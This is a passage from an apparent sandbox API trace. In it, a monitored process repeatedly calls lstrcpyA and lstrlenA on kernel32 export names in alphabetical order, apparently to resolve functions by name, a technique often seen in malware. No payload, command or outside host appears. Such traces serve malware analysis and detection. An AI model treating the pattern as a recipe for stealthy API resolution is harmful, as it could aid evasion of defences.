(lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0078.455] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0078.455] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0078.456] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0078.456] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0078.456] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0078.456] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0078.456] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0078.456] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0078.456] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0078.456] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0078.456] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0078.456] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0078.456] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0078.456] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0078.456] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0078.456] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0078.456] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0078.456] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0078.456] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0078.456] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0078.456] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0078.456] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0078.456] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0078.456] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0078.456] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0078.456] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0078.456] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0078.456] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0078.456] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0078.456] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0078.456] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0078.456] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0078.456] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0078.456] lstrlenA (lpString="BEEP") returned 4 [0078.456] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0078.456] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0078.456] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0078.456] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0078.457] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0078.457] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0078.457] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0078.457] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0078.457] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0078.457] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0078.457] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0078.457] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0078.457] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0078.457] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0078.457] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0078.457] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0078.457] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0078.457] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0078.457] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0078.457] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0078.457] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0078.457] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0078.457] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0078.457] lstrlenA (lpString="CANCELIO") returned 8 [0078.457] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0078.457] lstrlenA (lpString="CANCELIOEX") returned 10 [0078.457] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0078.457] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0078.457] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0078.457] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0078.457] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0078.457] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0078.457] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0078.457] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0078.457] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0078.457] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0078.457] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0078.457] lstrlenA (lpString="CHECKELEVATION") returned 14 [0078.457] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0078.457] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0078.458] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0078.458] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0078.458] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0078.458] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0078.458] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0078.458] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0078.458] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0078.458] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0078.458] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0078.458] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0078.458] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0078.458] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0078.458] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0078.458] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0078.458] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0078.458] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0078.458] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0078.458] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0078.458] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0078.458] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0078.458] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0078.458] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0078.458] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0078.458] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0078.458] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0078.458] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0078.458] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0078.458] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0078.458] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0078.458] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0078.458] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0078.458] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0078.458] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0078.458] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0078.458] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0078.458] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0078.458] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0078.459] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0078.459] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0078.459] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0078.459] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0078.459] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0078.459] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0078.459] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0078.459] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0078.459] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0078.459] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0078.459] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0078.459] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0078.459] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0078.459] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0078.459] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0078.459] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0078.459] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0078.459] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0078.459] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0078.459] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0078.459] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0078.459] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0078.459] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0078.459] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0078.459] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0078.459] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0078.459] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0078.459] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0078.459] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0078.459] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0078.459] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0078.459] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0078.459] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0078.459] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0078.459] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0078.459] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0078.459] lstrlenA (lpString="COPYCONTEXT") returned 11 [0078.460] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0078.460] lstrlenA (lpString="COPYFILEA") returned 9 [0078.460] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0078.460] lstrlenA (lpString="COPYFILEEXA") returned 11 [0078.460] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0078.460] lstrlenA (lpString="COPYFILEEXW") returned 11 [0078.460] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0078.460] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0078.460] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0078.460] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0078.460] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0078.460] lstrlenA (lpString="COPYFILEW") returned 9 [0078.460] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0078.460] lstrlenA (lpString="COPYLZFILE") returned 10 [0078.460] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0078.460] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0078.460] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0078.460] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0078.460] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0078.460] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0078.460] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0078.460] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0078.460] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0078.460] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0078.460] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0078.460] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0078.460] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0078.460] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0078.460] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0078.460] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0078.460] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0078.460] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0078.460] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0078.460] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0078.460] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0078.461] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0078.461] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0078.461] lstrlenA (lpString="CREATEEVENTA") returned 12 [0078.461] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0078.461] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0078.461] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0078.461] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0078.461] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0078.461] lstrlenA (lpString="CREATEEVENTW") returned 12 [0078.461] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0078.461] lstrlenA (lpString="CREATEFIBER") returned 11 [0078.461] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0078.461] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0078.461] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0078.461] lstrlenA (lpString="CREATEFILEA") returned 11 [0078.461] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0078.461] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0078.461] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0078.461] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0078.461] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0078.461] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0078.461] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0078.461] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0078.461] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0078.461] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0078.461] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0078.461] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0078.461] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0078.461] lstrlenA (lpString="CREATEFILEW") returned 11 [0078.461] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0078.461] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0078.461] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0078.461] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0078.461] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0078.461] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0078.461] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0078.462] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0078.462] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0078.462] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0078.462] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0078.462] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0078.462] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0078.462] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0078.462] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0078.462] lstrlenA (lpString="CREATEJOBSET") returned 12 [0078.462] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0078.462] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0078.462] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0078.462] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0078.462] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0078.462] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0078.462] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0078.462] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0078.462] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0078.462] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0078.462] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0078.462] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0078.462] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0078.462] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0078.462] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0078.462] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0078.462] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0078.462] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0078.462] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0078.462] lstrlenA (lpString="CREATEPIPE") returned 10 [0078.462] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0078.462] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0078.462] 